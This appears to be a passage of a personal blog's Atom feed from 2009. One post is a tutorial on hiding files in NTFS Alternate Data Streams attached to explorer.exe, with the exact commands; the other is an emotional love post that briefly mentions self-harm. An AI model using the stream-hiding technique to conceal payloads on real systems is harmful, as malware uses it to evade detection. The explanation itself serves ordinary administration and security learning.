/><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://2.bp.blogspot.com/-Gt2oM9Ob-IU/UJzlXjWhBYI/AAAAAAAAAi8/_LtVk7nXhz8/s220/profile.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://www.riyazwalikar.com/2009/09/once-upon-thursday.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0EBQX84eyp7ImA9WxNREEg.&quot;"><id>tag:blogger.com,1999:blog-4333330172780240225.post-8668768331682566692</id><published>2009-09-02T02:08:00.000-07:00</published><updated>2009-09-04T02:14:10.133-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-09-04T02:14:10.133-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="NTFS ADS" /><category scheme="http://www.blogger.com/atom/ns#" term="data hiding" /><category scheme="http://www.blogger.com/atom/ns#" term="NTStream" /><category scheme="http://www.blogger.com/atom/ns#" term="Backup APIs" /><title>NTFS Alternate Data Streams</title><content type="html">&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;The NTFS file system was a remarkable creation for the world of Windows. Windows NT systems have proven their local security largely on the basis of the NTFS file system. It included several new features: quotas, sparse file support, reparse points, distributed link tracking and the Encrypting File System (EFS). What I am going to describe here is not the file system itself, but a little known property of NTFS called ADS. ADS does not stand for Active Directory Services or Asynchronous Digital Systems or Another Dead Soul or anything that whacky. ADS or Alternate Data Stream is any data attached to another file but not within the file itself. 
Windows implements many of its little known functions like additional file information and tagging files as encrypted using ADS.&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;One of the most common uses of ADS is to store additional file information like the author's name, word count, pages and other document data of a Word file. You can view and edit this information by right-clicking a Word document &gt;&gt; Properties and clicking on the Summary tab. In fact any file will have a Summary tab on an NTFS drive so that you can indirectly edit the ADS of that particular file. A file without any custom information added contains a single data stream called $DATA, which is the data inside the file itself and is not an alternate data stream. Any other streams attached to it will have the format filename.extension:ADSname:$data. When you open a normal file the default $DATA is read, which is the data in the file itself. A normal file will be of the format filename.extension::$Data (note there is no ADS). Imagine you had a text file full of passwords and you had attached it to explorer.exe; then to access the contents of the passwords.txt file you would have to use explorer.exe:passwords.txt:$Data. You can even have ADS for a folder!! In fact any folder on an NTFS system. You could then store your passwords.txt file attached to C:\Windows!!&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;You can attach any number of files to any single file or folder. That means you could attach a 699 MB DvDrip AVI to a 4 MB Summer of 69.mp3 without increasing the size of your mp3 by a single byte!! Windows does not show the attached file in Explorer or by any normal means. The whole 699 MB can be stored on to the hard disk (without anybody knowing) and retrieved later.
Since ADS is not stored inside the parent file, the size of the mp3 remains the same!! Although disk space goes down by the same amount.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;That kinda sounds far-fetched, right? Alright, let's have a small demonstration. Let's use explorer.exe and passwords.txt&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Open Notepad and type the following:    &lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt;Orkut=h@ck3rz&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;Rediff=r3dm0nd123&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;facebook=!@#c3sium&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;These are web services and their respective passwords. You could type in anything you want. Then save the file as passwords.txt in the C: drive.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;Then go to Start &gt;&gt; Run &gt;&gt; cmd to open the command prompt. cd.. your way to C:\&gt; then type the following:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt;C:\&gt;type passwords.txt &gt; C:\Windows\explorer.exe:passwords.txt&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Delete the original passwords.txt file from the C: drive. The above command is self-explanatory, but for all those who didn't grasp its entirety, here's how it works. The type command is a cmd internal command to display the contents of a file, so type [filename] will display the contents of the text file.
The &gt;, also called the output redirection operator, is used to redirect output from one command to another command or file. C:\Windows\explorer.exe:passwords.txt is the ADS to explorer.exe called Passwords.txt. Now your file is safe and since you have attached it to explorer.exe (highly unlikely to be deleted) you can sleep well.&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;To retrieve the text file or the data inside, you can again use the command prompt or Notepad.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;Using command prompt:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt;C:\&gt;more &lt; &lt;/span&gt;&lt;/span&gt;    &lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt;C:\Windows\explorer.exe:passwords.txt&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;More is used to display output one screen at a time. Conveniently, type does not work to display file contents here. The &lt;, also (you must have already guessed it) called the input redirection operator, takes the contents of the file and gives them to more so they are displayed a (screen) page at a time.
To dump it back to a text file use&lt;/span&gt;&lt;/span&gt;:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt;C:\&gt;echo | more &lt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt; C:\Windows\explorer.exe:passwords.txt&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt; &gt; Passwords.txt&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;This is slightly complicated. Echo is used to display whatever is given to it as an argument. Echo Hello will display Hello. The pipe (|) is used to pass the output of the more command to echo and the &gt; is used to dump whatever got echoed to the text file Passwords.txt. Here is a simpler method.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=";font-family:trebuchet ms;font-size:100%;"  &gt;Using Notepad:&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;Go to Start &gt;&gt; Run and type the following.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt;Notepad C:\Windows\Explorer.exe:Passwords.txt&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=";font-family:trebuchet ms;font-size:100%;"  &gt;Notepad should open up displaying the contents of the file. You can then use File &gt;&gt; Save As to save it anywhere you want.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;I went ahead and wrote a program that allows you to work with NTFS Alternate Data Streams (ADS) with ease. You can scan your whole hard disk for NTFS ADS, and you can create, delete, modify and export streams easily. This application uses the native Windows API and hence is pretty fast at it.
The application called NTStream is available &lt;/span&gt;&lt;a style="font-family: trebuchet ms;" href="http://riyazahemed.webng.com/winsystools/NTStream-Setup.zip"&gt; here&lt;/a&gt;&lt;/span&gt;.&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_17JNeVdiZ7k/Sp47M6SpLpI/AAAAAAAAARE/dW-VrM4imx8/s1600-h/Image1.PNG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 311px;" src="http://1.bp.blogspot.com/_17JNeVdiZ7k/Sp47M6SpLpI/AAAAAAAAARE/dW-VrM4imx8/s400/Image1.PNG" alt="" id="BLOGGER_PHOTO_ID_5376800098118872722" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;font-family:verdana;font-size:85%;"  &gt;Ntstream&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Since ADS is any data attached to another file, it will be deleted only if you delete the parent file or if you use a third-party tool to delete it. Always remember the name of the data stream and the parent file to which you attached it. Creating data streams could take up valuable hard disk space (if you are planning to hide large files like movies etc.). You can use ADS to hide any type of data, even executable code. Although that's not good administrative practice, it can be done. Viruses and worms like Email-Worm.Win32.Dumaru.a and Win2K.Stream use ADS to spread.
Use ADS efficiently and non-maliciously, use it to your advantage.&lt;/span&gt;&lt;/span&gt;&lt;img src="http://feeds.feedburner.com/~r/riyazwalikar/~4/dUAyE-nxQH4" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.riyazwalikar.com/feeds/8668768331682566692/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.riyazwalikar.com/2009/09/ntfs-alternate-data-streams.html#comment-form" title="3 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/8668768331682566692?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/8668768331682566692?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/riyazwalikar/~3/dUAyE-nxQH4/ntfs-alternate-data-streams.html" title="NTFS Alternate Data Streams" /><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://2.bp.blogspot.com/-Gt2oM9Ob-IU/UJzlXjWhBYI/AAAAAAAAAi8/_LtVk7nXhz8/s220/profile.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_17JNeVdiZ7k/Sp47M6SpLpI/AAAAAAAAARE/dW-VrM4imx8/s72-c/Image1.PNG" height="72" width="72" /><thr:total>3</thr:total><feedburner:origLink>http://www.riyazwalikar.com/2009/09/ntfs-alternate-data-streams.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0EDRn84fip7ImA9WxNSEE8.&quot;"><id>tag:blogger.com,1999:blog-4333330172780240225.post-5542288483259434388</id><published>2009-08-23T03:49:00.000-07:00</published><updated>2009-08-23T04:07:57.136-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-08-23T04:07:57.136-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="angel" 
/><category scheme="http://www.blogger.com/atom/ns#" term="life" /><category scheme="http://www.blogger.com/atom/ns#" term="memories" /><category scheme="http://www.blogger.com/atom/ns#" term="love" /><title>My Angel</title><content type="html">&lt;span style=";font-family:trebuchet ms;font-size:100%;"  &gt;She is a year younger than me. We have known each other for over 2 years now, but it seems like we have known each other for centuries. She’s absolutely normal, no complaints at all, like any other girl of her age, extra sensitive towards ideas that have nothing to do with her, mounting tension about studies and placements gripping her every weekend, a feeble smile when she is hurt and two huge tear drops in her eyes when I’m going back to work. With hair that keeps coming across her face whenever I try to stare into her deep black eyes. She pulls them back of course and I swear to God I forget where I am. Life seems complete when she puts her head on to my shoulders and goes to sleep. I feel like living a thousand years, just looking at her talk with constant nods of her head. I feel like pulling her into my arms when she yells that I wasn't listening to her. Life... Life is dragging me hopelessly... I don't know where...&lt;br /&gt;&lt;br /&gt;I was an evangelist, preaching how dangerous women are until I met her. She is the sweetest thing that has happened to me. We have exchanged promises, promises of staying together for now and forever, promises of laughing, playing, fighting, eating, walking, dancing, cooking and all the other things I once thought stupid. I cry in the night, when I go to sleep all alone 800 kms away from my sweetheart.
Memories of the times we have spent together, the way she nods her head even when she hasn’t understood what I was telling her, her scolding when I would forget to take my medicines, the threatening messages when I don't call her back after she keeps the phone, the times spent in arguing over unimportant stuff, the things she said to me, the care that I take while speaking lest I hurt her, the "You eat first and tell me, then I'll eat" talks, the exam tips that she often took, the "I will love you forever", the numerous "miss you idiot" and they go on. Memories... Sweet memories are all what I have when I am this far, physically separated but emotionally still single. All our friends who know about us swear by our love, a single soul in two bodies, that's what they say. It's difficult to imagine life without her. We can't live without each other. It's difficult to even let go of each other's hands when we are getting off the bus!! Life is beautiful when we are together but yet I have to work here in desolation and solitude staring at my screen in the nostalgic company of her photographs. I think over what I have lost and what I have gained by coming here. It was a choice I had to make. Had to come here to earn, to have her. I know people say "money isn't everything", ask me I say. Was sworn by my family long before I had known her, had promised my folks back home to give them a life that they have always desired and then think about settling down in life. Give them all the luxury that my hardworking father never could provide. And all that within the next 3 years.&lt;br /&gt;&lt;br /&gt;But alas, God, I feel, doesn't wish to see us together, I am a mortal fighting to have my love with me for eternity. I cry every day, I pray for us, I hurt myself to subdue the pain within, yet the pain that increases with every single day I spend away from her, away from my little angel, yes I call her my angel, my sweet little angel, the pain never fades.
The pain is horrible, it's like somebody is holding on to your dreams ready to leave them so that they fall and shatter and it is assumed that you will forget as winds of time sweep off the dust that remains. Forget her? God I could forget I have to breathe, but her? Why are you asking such a heavy price? I cannot fathom what will happen if I am forced to live without her. I have already lost my senses without her next to me here; it won’t be long before I lose myself completely. With parents who come from psychological backgrounds where falling in love is considered to be a violation of the rules of Mother Nature. Where it is thought upholding the honor and dignity of family traditions, rituals and fervor is more important than you being happy with a girl who means the world to you. Where it is thought the so-called man-made society will talk year after year about the boy who stood against his parents. Where it is thought that choices made by the elders are always right and it is assumed that you will lead a happy life with a complete stranger. Why did God make choices? Why can’t God make our parents understand? Why can’t God just leave us alone?&lt;br /&gt;&lt;br /&gt;Eyes reddened with tears, heart heavy and aching with her thoughts, sleepless with feelings that haunt me day and night, I live on.
Why did God ever make religions?&lt;br /&gt;&lt;/span&gt;&lt;img src="http://feeds.feedburner.com/~r/riyazwalikar/~4/tmAlUGct4T0" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.riyazwalikar.com/feeds/5542288483259434388/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.riyazwalikar.com/2009/08/my-angel.html#comment-form" title="4 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/5542288483259434388?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/5542288483259434388?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/riyazwalikar/~3/tmAlUGct4T0/my-angel.html" title="My Angel" /><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://2.bp.blogspot.com/-Gt2oM9Ob-IU/UJzlXjWhBYI/AAAAAAAAAi8/_LtVk7nXhz8/s220/profile.jpg" /></author><thr:total>4</thr:total><feedburner:origLink>http://www.riyazwalikar.com/2009/08/my-angel.html</feedburner:origLink></entry></feed>
